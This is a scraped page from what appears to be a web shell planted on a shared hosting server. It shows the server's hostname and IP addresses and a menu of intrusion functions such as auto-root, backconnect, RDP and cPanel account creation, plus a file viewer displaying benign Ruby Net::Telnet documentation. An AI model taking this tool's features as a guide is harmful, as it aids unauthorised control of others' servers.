Linux server220.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
: 198.54.116.164 | : 216.73.216.179
Cant Read [ /etc/named.conf ]
7.4.33
adnangch
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby18 /
share /
ri /
1.8 /
system /
Net /
Telnet /
[ HOME SHELL ]
Name
Size
Permission
Action
binmode%3d-i.yaml
265
B
-rw-r--r--
binmode-i.yaml
365
B
-rw-r--r--
cdesc-Telnet.yaml
4.97
KB
-rw-r--r--
cmd-i.yaml
1.75
KB
-rw-r--r--
login-i.yaml
1.43
KB
-rw-r--r--
new-c.yaml
5.74
KB
-rw-r--r--
preprocess-i.yaml
540
B
-rw-r--r--
print-i.yaml
502
B
-rw-r--r--
puts-i.yaml
330
B
-rw-r--r--
telnetmode%3d-i.yaml
398
B
-rw-r--r--
telnetmode-i.yaml
493
B
-rw-r--r--
waitfor-i.yaml
2.46
KB
-rw-r--r--
write-i.yaml
407
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cmd-i.yaml
--- !ruby/object:RI::MethodDescription aliases: [] block_params: recvdata comment: - !ruby/struct:SM::Flow::P body: Send a command to the host. - !ruby/struct:SM::Flow::P body: More exactly, sends a string to the host, and reads in all received data until is sees the prompt or other matched sequence. - !ruby/struct:SM::Flow::P body: If a block is given, the received data will be yielded to it as it is read in. Whether a block is given or not, the received data will be return as a string. Note that the received data includes the prompt and in most cases the host's echo of our command. - !ruby/struct:SM::Flow::P body: "<tt>options</tt> is either a String, specified the string or command to send to the host; or it is a hash of options. If a hash, the following options can be specified:" - !ruby/object:SM::Flow::LIST contents: - !ruby/struct:SM::Flow::LI label: "String:" body: the command or other string to send to the host. - !ruby/struct:SM::Flow::LI label: "Match:" body: a regular expression, the sequence to look for in the received data before returning. If not specified, the Prompt option value specified when this instance was created will be used, or, failing that, the default prompt of /[$%#>] \z/n. - !ruby/struct:SM::Flow::LI label: "Timeout:" body: the seconds to wait for data from the host before raising a Timeout error. If not specified, the Timeout option value specified when this instance was created will be used, or, failing that, the default value of 10 seconds. type: :NOTE - !ruby/struct:SM::Flow::P body: The command or other string will have the newline sequence appended to it. full_name: Net::Telnet#cmd is_singleton: false name: cmd params: (options) {|recvdata| ...} visibility: public
Close